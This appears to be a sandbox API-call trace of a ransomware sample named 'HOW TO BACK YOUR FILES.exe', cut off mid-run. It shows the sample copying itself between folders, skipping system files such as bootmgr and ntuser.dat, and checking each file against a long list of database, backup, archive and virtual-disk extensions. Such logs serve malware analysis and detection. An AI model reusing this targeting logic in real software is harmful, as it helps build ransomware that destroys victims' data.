ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.061] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.061] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.061] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.061] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.061] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.061] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.061] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.061] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.061] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c65bbc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.061] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.061] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c65bbc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.061] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.061] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7810 [0089.061] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\MF", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF") returned="C:\\Users\\All Users\\Microsoft\\MF" [0089.061] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6288 | out: hHeap=0x2b0000) returned 1 [0089.061] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0089.062] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MF") returned 31 [0089.062] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\MF" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF") returned="C:\\Users\\All Users\\Microsoft\\MF" [0089.062] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.062] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\MF\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\mf\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.062] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.062] GetLastError () returned 0x0 [0089.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.062] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.062] CloseHandle (hObject=0x120) returned 1 [0089.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.063] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.063] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.063] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.063] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.063] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.063] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.063] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.063] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.063] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.063] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.063] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="aoldtz.exe") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2=".") returned 1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="..") returned 1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="windows") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="bootmgr") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="temp") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="pagefile.sys") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="boot") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="ids.txt") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="ntuser.dat") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="perflogs") returned -1 [0089.063] lstrcmpiW (lpString1="Active.GRL", lpString2="MSBuild") returned -1 [0089.063] lstrlenW (lpString="Active.GRL") returned 10 [0089.063] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MF\\*") returned 33 [0089.063] lstrcpyW (in: lpString1=0x2cce440, lpString2="Active.GRL" | out: lpString1="Active.GRL") returned="Active.GRL" [0089.063] lstrlenW (lpString="Active.GRL") returned 10 [0089.063] lstrlenW (lpString="Ares865") returned 7 [0089.063] lstrcmpiW (lpString1="ive.GRL", lpString2="Ares865") returned 1 [0089.063] lstrlenW (lpString=".dll") returned 4 [0089.064] lstrcmpiW (lpString1="Active.GRL", lpString2=".dll") returned 1 [0089.064] lstrlenW (lpString=".lnk") returned 4 [0089.064] lstrcmpiW (lpString1="Active.GRL", lpString2=".lnk") returned 1 [0089.064] lstrlenW (lpString=".ini") returned 4 [0089.064] lstrcmpiW (lpString1="Active.GRL", lpString2=".ini") returned 1 [0089.064] lstrlenW (lpString=".sys") returned 4 [0089.064] lstrcmpiW (lpString1="Active.GRL", lpString2=".sys") returned 1 [0089.064] lstrlenW (lpString="Active.GRL") returned 10 [0089.064] lstrlenW (lpString="bak") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="bak") returned 1 [0089.064] lstrlenW (lpString="ba_") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="ba_") returned 1 [0089.064] lstrlenW (lpString="dbb") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="dbb") returned 1 [0089.064] lstrlenW (lpString="vmdk") returned 4 [0089.064] lstrcmpiW (lpString1=".GRL", lpString2="vmdk") returned -1 [0089.064] lstrlenW (lpString="rar") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="rar") returned -1 [0089.064] lstrlenW (lpString="zip") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="zip") returned -1 [0089.064] lstrlenW (lpString="tgz") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="tgz") returned -1 [0089.064] lstrlenW (lpString="vbox") returned 4 [0089.064] lstrcmpiW (lpString1=".GRL", lpString2="vbox") returned -1 [0089.064] lstrlenW (lpString="vdi") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="vdi") returned -1 [0089.064] lstrlenW (lpString="vhd") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="vhd") returned -1 [0089.064] lstrlenW (lpString="vhdx") returned 4 [0089.064] lstrcmpiW (lpString1=".GRL", lpString2="vhdx") returned -1 [0089.064] lstrlenW (lpString="avhd") returned 4 [0089.064] lstrcmpiW (lpString1=".GRL", lpString2="avhd") returned -1 [0089.064] lstrlenW (lpString="db") returned 2 [0089.064] lstrcmpiW (lpString1="RL", lpString2="db") returned 1 [0089.064] lstrlenW (lpString="db2") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="db2") returned 1 [0089.064] lstrlenW (lpString="db3") returned 3 [0089.064] lstrcmpiW (lpString1="GRL", lpString2="db3") returned 1 [0089.064] lstrlenW (lpString="dbf") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="dbf") returned 1 [0089.065] lstrlenW (lpString="mdf") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="mdf") returned -1 [0089.065] lstrlenW (lpString="mdb") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="mdb") returned -1 [0089.065] lstrlenW (lpString="sql") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="sql") returned -1 [0089.065] lstrlenW (lpString="sqlite") returned 6 [0089.065] lstrcmpiW (lpString1="ve.GRL", lpString2="sqlite") returned 1 [0089.065] lstrlenW (lpString="sqlite3") returned 7 [0089.065] lstrcmpiW (lpString1="ive.GRL", lpString2="sqlite3") returned -1 [0089.065] lstrlenW (lpString="sqlitedb") returned 8 [0089.065] lstrcmpiW (lpString1="tive.GRL", lpString2="sqlitedb") returned 1 [0089.065] lstrlenW (lpString="xml") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="xml") returned -1 [0089.065] lstrlenW (lpString="$er") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="$er") returned 1 [0089.065] lstrlenW (lpString="4dd") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="4dd") returned 1 [0089.065] lstrlenW (lpString="4dl") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="4dl") returned 1 [0089.065] lstrlenW (lpString="^^^") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="^^^") returned 1 [0089.065] lstrlenW (lpString="abs") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="abs") returned 1 [0089.065] lstrlenW (lpString="abx") returned 3 [0089.065] lstrcmpiW (lpString1="GRL", lpString2="abx") returned 1 [0089.065] lstrlenW (lpString="accdb") returned 5 [0089.065] lstrcmpiW (lpString1="e.GRL", lpString2="accdb") returned 1 [0089.065] lstrlenW (lpString="accdc") returned 5 [0089.065] lstrcmpiW (lpString1="e.GRL", lpString2="accdc") returned 1 [0089.065] lstrlenW (lpString="accde") returned 5 [0089.065] lstrcmpiW (lpString1="e.GRL", lpString2="accde") returned 1 [0089.065] lstrlenW (lpString="accdr") returned 5 [0089.065] lstrcmpiW (lpString1="e.GRL", lpString2="accdr") returned 1 [0089.065] lstrlenW (lpString="accdt") returned 5 [0089.065] lstrcmpiW (lpString1="e.GRL", lpString2="accdt") returned 1 [0089.065] lstrlenW (lpString="accdw") returned 5 [0089.065] lstrcmpiW (lpString1="e.GRL", lpString2="accdw") returned 1 [0089.066] lstrlenW (lpString="accft") returned 5 [0089.066] lstrcmpiW (lpString1="e.GRL", lpString2="accft") returned 1 [0089.066] lstrlenW (lpString="adb") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="adb") returned 1 [0089.066] lstrlenW (lpString="adb") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="adb") returned 1 [0089.066] lstrlenW (lpString="ade") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="ade") returned 1 [0089.066] lstrlenW (lpString="adf") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="adf") returned 1 [0089.066] lstrlenW (lpString="adn") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="adn") returned 1 [0089.066] lstrlenW (lpString="adp") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="adp") returned 1 [0089.066] lstrlenW (lpString="alf") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="alf") returned 1 [0089.066] lstrlenW (lpString="ask") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="ask") returned 1 [0089.066] lstrlenW (lpString="btr") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="btr") returned 1 [0089.066] lstrlenW (lpString="cat") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="cat") returned 1 [0089.066] lstrlenW (lpString="cdb") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="cdb") returned 1 [0089.066] lstrlenW (lpString="ckp") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="ckp") returned 1 [0089.066] lstrlenW (lpString="cma") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="cma") returned 1 [0089.066] lstrlenW (lpString="cpd") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="cpd") returned 1 [0089.066] lstrlenW (lpString="dacpac") returned 6 [0089.066] lstrcmpiW (lpString1="ve.GRL", lpString2="dacpac") returned 1 [0089.066] lstrlenW (lpString="dad") returned 3 [0089.066] lstrcmpiW (lpString1="GRL", lpString2="dad") returned 1 [0089.066] lstrlenW (lpString="dadiagrams") returned 10 [0089.066] lstrlenW (lpString="daschema") returned 8 [0089.066] lstrcmpiW (lpString1="tive.GRL", lpString2="daschema") returned 1 [0089.066] lstrlenW (lpString="db-journal") returned 10 [0089.067] lstrlenW (lpString="db-shm") returned 6 [0089.067] lstrcmpiW (lpString1="ve.GRL", lpString2="db-shm") returned 1 [0089.067] lstrlenW (lpString="db-wal") returned 6 [0089.067] lstrcmpiW (lpString1="ve.GRL", lpString2="db-wal") returned 1 [0089.067] lstrlenW (lpString="dbc") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dbc") returned 1 [0089.067] lstrlenW (lpString="dbs") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dbs") returned 1 [0089.067] lstrlenW (lpString="dbt") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dbt") returned 1 [0089.067] lstrlenW (lpString="dbv") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dbv") returned 1 [0089.067] lstrlenW (lpString="dbx") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dbx") returned 1 [0089.067] lstrlenW (lpString="dcb") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dcb") returned 1 [0089.067] lstrlenW (lpString="dct") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dct") returned 1 [0089.067] lstrlenW (lpString="dcx") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dcx") returned 1 [0089.067] lstrlenW (lpString="ddl") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="ddl") returned 1 [0089.067] lstrlenW (lpString="dlis") returned 4 [0089.067] lstrcmpiW (lpString1=".GRL", lpString2="dlis") returned -1 [0089.067] lstrlenW (lpString="dp1") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dp1") returned 1 [0089.067] lstrlenW (lpString="dqy") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dqy") returned 1 [0089.067] lstrlenW (lpString="dsk") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dsk") returned 1 [0089.067] lstrlenW (lpString="dsn") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dsn") returned 1 [0089.067] lstrlenW (lpString="dtsx") returned 4 [0089.067] lstrcmpiW (lpString1=".GRL", lpString2="dtsx") returned -1 [0089.067] lstrlenW (lpString="dxl") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="dxl") returned 1 [0089.067] lstrlenW (lpString="eco") returned 3 [0089.067] lstrcmpiW (lpString1="GRL", lpString2="eco") returned 1 [0089.067] lstrlenW (lpString="ecx") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="ecx") returned 1 [0089.068] lstrlenW (lpString="edb") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="edb") returned 1 [0089.068] lstrlenW (lpString="epim") returned 4 [0089.068] lstrcmpiW (lpString1=".GRL", lpString2="epim") returned -1 [0089.068] lstrlenW (lpString="fcd") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fcd") returned 1 [0089.068] lstrlenW (lpString="fdb") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fdb") returned 1 [0089.068] lstrlenW (lpString="fic") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fic") returned 1 [0089.068] lstrlenW (lpString="flexolibrary") returned 12 [0089.068] lstrlenW (lpString="fm5") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fm5") returned 1 [0089.068] lstrlenW (lpString="fmp") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fmp") returned 1 [0089.068] lstrlenW (lpString="fmp12") returned 5 [0089.068] lstrcmpiW (lpString1="e.GRL", lpString2="fmp12") returned -1 [0089.068] lstrlenW (lpString="fmpsl") returned 5 [0089.068] lstrcmpiW (lpString1="e.GRL", lpString2="fmpsl") returned -1 [0089.068] lstrlenW (lpString="fol") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fol") returned 1 [0089.068] lstrlenW (lpString="fp3") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fp3") returned 1 [0089.068] lstrlenW (lpString="fp4") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fp4") returned 1 [0089.068] lstrlenW (lpString="fp5") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fp5") returned 1 [0089.068] lstrlenW (lpString="fp7") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fp7") returned 1 [0089.068] lstrlenW (lpString="fpt") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="fpt") returned 1 [0089.068] lstrlenW (lpString="frm") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="frm") returned 1 [0089.068] lstrlenW (lpString="gdb") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="gdb") returned 1 [0089.068] lstrlenW (lpString="gdb") returned 3 [0089.068] lstrcmpiW (lpString1="GRL", lpString2="gdb") returned 1 [0089.068] lstrlenW (lpString="grdb") returned 4 [0089.069] lstrcmpiW (lpString1=".GRL", lpString2="grdb") returned -1 [0089.069] lstrlenW (lpString="gwi") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="gwi") returned -1 [0089.069] lstrlenW (lpString="hdb") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="hdb") returned -1 [0089.069] lstrlenW (lpString="his") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="his") returned -1 [0089.069] lstrlenW (lpString="ib") returned 2 [0089.069] lstrcmpiW (lpString1="RL", lpString2="ib") returned 1 [0089.069] lstrlenW (lpString="idb") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="idb") returned -1 [0089.069] lstrlenW (lpString="ihx") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="ihx") returned -1 [0089.069] lstrlenW (lpString="itdb") returned 4 [0089.069] lstrcmpiW (lpString1=".GRL", lpString2="itdb") returned -1 [0089.069] lstrlenW (lpString="itw") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="itw") returned -1 [0089.069] lstrlenW (lpString="jet") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="jet") returned -1 [0089.069] lstrlenW (lpString="jtx") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="jtx") returned -1 [0089.069] lstrlenW (lpString="kdb") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="kdb") returned -1 [0089.069] lstrlenW (lpString="kexi") returned 4 [0089.069] lstrcmpiW (lpString1=".GRL", lpString2="kexi") returned -1 [0089.069] lstrlenW (lpString="kexic") returned 5 [0089.069] lstrcmpiW (lpString1="e.GRL", lpString2="kexic") returned -1 [0089.069] lstrlenW (lpString="kexis") returned 5 [0089.069] lstrcmpiW (lpString1="e.GRL", lpString2="kexis") returned -1 [0089.069] lstrlenW (lpString="lgc") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="lgc") returned -1 [0089.069] lstrlenW (lpString="lwx") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="lwx") returned -1 [0089.069] lstrlenW (lpString="maf") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="maf") returned -1 [0089.069] lstrlenW (lpString="maq") returned 3 [0089.069] lstrcmpiW (lpString1="GRL", lpString2="maq") returned -1 [0089.069] lstrlenW (lpString="mar") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mar") returned -1 [0089.070] lstrlenW (lpString="marshal") returned 7 [0089.070] lstrcmpiW (lpString1="ive.GRL", lpString2="marshal") returned -1 [0089.070] lstrlenW (lpString="mas") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mas") returned -1 [0089.070] lstrlenW (lpString="mav") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mav") returned -1 [0089.070] lstrlenW (lpString="maw") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="maw") returned -1 [0089.070] lstrlenW (lpString="mdbhtml") returned 7 [0089.070] lstrcmpiW (lpString1="ive.GRL", lpString2="mdbhtml") returned -1 [0089.070] lstrlenW (lpString="mdn") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mdn") returned -1 [0089.070] lstrlenW (lpString="mdt") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mdt") returned -1 [0089.070] lstrlenW (lpString="mfd") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mfd") returned -1 [0089.070] lstrlenW (lpString="mpd") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mpd") returned -1 [0089.070] lstrlenW (lpString="mrg") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mrg") returned -1 [0089.070] lstrlenW (lpString="mud") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mud") returned -1 [0089.070] lstrlenW (lpString="mwb") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="mwb") returned -1 [0089.070] lstrlenW (lpString="myd") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="myd") returned -1 [0089.070] lstrlenW (lpString="ndf") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="ndf") returned -1 [0089.070] lstrlenW (lpString="nnt") returned 3 [0089.070] lstrcmpiW (lpString1="GRL", lpString2="nnt") returned -1 [0089.070] lstrlenW (lpString="nrmlib") returned 6 [0089.071] lstrcmpiW (lpString1="ve.GRL", lpString2="nrmlib") returned 1 [0089.071] lstrlenW (lpString="ns2") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="ns2") returned -1 [0089.071] lstrlenW (lpString="ns3") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="ns3") returned -1 [0089.071] lstrlenW (lpString="ns4") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="ns4") returned -1 [0089.071] lstrlenW (lpString="nsf") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="nsf") returned -1 [0089.071] lstrlenW (lpString="nv") returned 2 [0089.071] lstrcmpiW (lpString1="RL", lpString2="nv") returned 1 [0089.071] lstrlenW (lpString="nv2") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="nv2") returned -1 [0089.071] lstrlenW (lpString="nwdb") returned 4 [0089.071] lstrcmpiW (lpString1=".GRL", lpString2="nwdb") returned -1 [0089.071] lstrlenW (lpString="nyf") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="nyf") returned -1 [0089.071] lstrlenW (lpString="odb") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="odb") returned -1 [0089.071] lstrlenW (lpString="odb") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="odb") returned -1 [0089.071] lstrlenW (lpString="oqy") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="oqy") returned -1 [0089.071] lstrlenW (lpString="ora") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="ora") returned -1 [0089.071] lstrlenW (lpString="orx") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="orx") returned -1 [0089.071] lstrlenW (lpString="owc") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="owc") returned -1 [0089.071] lstrlenW (lpString="p96") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="p96") returned -1 [0089.071] lstrlenW (lpString="p97") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="p97") returned -1 [0089.071] lstrlenW (lpString="pan") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="pan") returned -1 [0089.071] lstrlenW (lpString="pdb") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="pdb") returned -1 [0089.071] lstrlenW (lpString="pdm") returned 3 [0089.071] lstrcmpiW (lpString1="GRL", lpString2="pdm") returned -1 [0089.072] lstrlenW (lpString="pnz") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="pnz") returned -1 [0089.072] lstrlenW (lpString="qry") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="qry") returned -1 [0089.072] lstrlenW (lpString="qvd") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="qvd") returned -1 [0089.072] lstrlenW (lpString="rbf") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="rbf") returned -1 [0089.072] lstrlenW (lpString="rctd") returned 4 [0089.072] lstrcmpiW (lpString1=".GRL", lpString2="rctd") returned -1 [0089.072] lstrlenW (lpString="rod") returned 3 